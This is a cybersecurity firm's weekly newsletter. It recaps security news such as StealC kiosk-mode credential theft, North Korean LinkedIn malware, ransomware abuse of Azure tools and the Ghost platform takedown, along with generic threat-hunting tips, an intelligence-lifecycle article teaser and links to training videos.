Triage The Week 042 – Kraven Security

Welcome back to Kraven Security’s weekly newsletter, where we triage the week. We’ll recap the week’s biggest news stories, highlight our lead story, give you some educational resources, and wrap up with a few personal notes on what’s happening at the company. Enjoy!

Top 5 News Stories

Malware blocks web browser in kiosk mode to steal login credentials

A new malware campaign blocks users in their browser’s kiosk mode in order to steal Google login credentials.

Top 4 key conclusions:
🪲 The malware starts the browser in kiosk mode, making it full screen and preventing navigation away from the login page. The user is then forced to enter their credentials to “unlock” the browser.
🪪 Once the credentials are saved, the StealC malware steals them from the browser’s credentials store.
⚡️ The technique is implemented using an AutoIt script, which identifies available browsers and launches them in kiosk mode, targeting specific services such as Google.
🛡️ Users should avoid entering sensitive information and use keyboard shortcuts or Task Manager to close the browser. Perform a hard reset if necessary and run a full antivirus scan.

OALABS research

North Korean hackers use LinkedIn and coding challenges to spread malware

North Korean cybercriminals are targeting cryptocurrency users on LinkedIn with malware called RustDoor.

Top 4 key conclusions:
💬 The FBI has issued a public service announcement warning the crypto industry of targeted attacks by North Korea using social engineering techniques.
🥸 Attackers use professional networking platforms to pose as recruiters and spread malware through coding challenges.
🪲 The malware is distributed via booby-trapped Visual Studio projects and contains backdoor functionality.
🛡️ It is crucial to train employees to be careful with unsolicited contacts on social media and to avoid using unknown software.

jam

Azure Storage Explorer now being abused by ransomware gangs

Ransomware gangs like BianLian and Rhysida use Azure Storage Explorer and Microsoft’s AzCopy to steal data from infected networks and store it in Azure Blob storage.

Top 4 key conclusions:
🎯 Azure’s trusted state, scalability, and performance make it an attractive option for attackers to quickly and quietly exfiltrate large amounts of data.
⚙️ Azure Storage Explore is typically used for managing Azure storage, but has also been used by malicious actors for large-scale data transfers to cloud storage.
🪵 Using log files created by Storage Explorer and AzCopy, investigators can determine what data was stolen and identify other possible payloads.
🛡️ Recommended defensive measures include monitoring AzCopy execution, egress traffic to Azure Blob Storage endpoints, and setting alarms for unusual file copy or access patterns.

modePUSH

At least nine people were killed after pagers used by Hezbollah members exploded across the country. More than 2,750 people were injured, more than 200 seriously.

Top 4 key conclusions:
💬 Hezbollah accuses Israel of causing the explosions. According to Hezbollah, the explosions were intercepted and equipped with detonators.
🚑 The Lebanese Red Cross has deployed 130 ambulances and more than 500 first aid workers to manage the aftermath and has issued an urgent appeal for blood donors.
📅 The incident has been compared to a 1996 event in which Israeli intelligence services assassinated Hamas’s top bomb maker by detonating explosives in his mobile phone.
🕵️ Post-Snowden leaks have shown how easy it is for governments to intercept technology purchases and add software or whatever. But to do it on such a large scale suggests an unprecedented intelligence coup.

Al Jazeera

Europol dismantles encrypted communications platform ‘Ghost’

Europol and law enforcement agencies from nine countries have successfully dismantled the encrypted communications platform ‘Ghost’, which was used by organised crime for activities such as drug trafficking and money laundering.

Top 3 key conclusions:

🔐 Ghost offered advanced security features, including three layers of encryption and a message self-destruct system. A subscription cost $2,350 for six months.

👻 Ghost was reportedly used for drug trafficking, money laundering, and ordering murders.

👮 The investigation, which began in March 2022, led to the discovery of Ghost’s servers and assets, resulting in 51 arrests across multiple countries.

😬 The dismantling of Ghost and similar platforms has fragmented the encrypted communications landscape, making it harder for law enforcement to track criminal activity.

Europol

Top tips of the week

Threat Information

• Conduct threat intelligence awareness sessions. Ensure all team members understand the value and application of threat intel.

Threat Hunt

• Foster a proactive mindset when hunting threats. Be the hunter, not the hunted. Anticipate and neutralize potential threats.
• Embrace a proactive mindset when hunting cyber threats. Anticipate and neutralize potential threats before they escalate.
• Use threat intelligence for risk assessment when hunting cyber threats. Identify and prioritize potential risks to allocate resources effectively.

Custom tools

• Collaborate with threat modeling teams during custom tool development. Identify potential risks and vulnerabilities to strengthen security measures.
• Implement secure coding practices in custom tool development. Address code-level vulnerabilities to improve overall security.
• Communicate regular updates about customized tools to your team. Keep stakeholders informed about improvements and changes.

Main article

Analyzing cyber threat intelligence can be daunting. You’re often overwhelmed with data, drowning in overlapping connections, and don’t know where to start or when to finish your analysis. To help their analysts navigate the maze, intelligence organizations around the world use the intelligence lifecycle.

The intelligence lifecycle is a structured approach to collecting, analyzing, and distributing intelligence. It serves as a template that analysts can follow to produce or consume intelligence. The cybersecurity industry has adapted this lifecycle to its needs by creating the cyber threat intelligence (CTI) lifecycle.

This article is your essential guide to the CTI lifecycle. You’ll learn about the six phases, how this model is used in the real world, and how to get the most out of it. Let’s get started!

Read now

Teaching materials

Edit your videos faster!

Creating content and teaching others is a great way to solidify your understanding of a topic. If you want to do this by creating videos, check this out!

In this presentation, MrAlexTech explores efficient editing in DaVinci Resolve. He covers various tips, tricks, and workflows to speed up the editing process, making it more accessible and manageable for everyone.

Learn how to scrape Telegram with Python

Scripting skills are essential if you want a long and fulfilling career in cybersecurity.

This video (by the legendary John Hammond) shows how to scrape Telegram channels and messages using Python, specifically the Telethon library. It covers installation, setup, and basic usage, including sending messages and joining channels.

Use this video as a stepping stone to creating your own web scrapers in Python!

How do you manage your time?

Time management is a skill we all need to master to combat the busyness of 21st century life. This is especially true if you are an entrepreneur, have a side hustle or are looking to make a career change.

This video discusses how to manage your time effectively as an entrepreneur, focusing on strategies from Dan Martell’s book “Buy Back Your Time”. These include overcoming the pain barrier in growing a business, the buyback loop, the drip matrix, and the three transactions that matter.

I highly recommend you watch this movie and then buy the book!

Become an Active Directory master today!

To successfully attack or defend large organizations, you need to understand Active Directory.

This video is a beginner’s guide to Active Directory. Dale Hobbs does a great job of covering the basics, such as objects, architecture, trusts, group policy, certificates, and more.

He also discusses common issues and challenges that IT teams face when setting up and using Active Directory at scale, and provides best practices for securing it.

Personal notes

🤔 Back to making videos!

This week at Kraven we’ve been busy turning our written content into videos. We’ve been writing scripts, filming, and editing new videos for our MISP series!

Creating videos requires a completely different skill set than creating written content. This has made adding videos to our repertoire of free learning resources both fun and challenging. It’s been a steep learning curve, but we’re improving our process and quality with each new video.

I look forward to sharing what we’ve created with you in the coming weeks.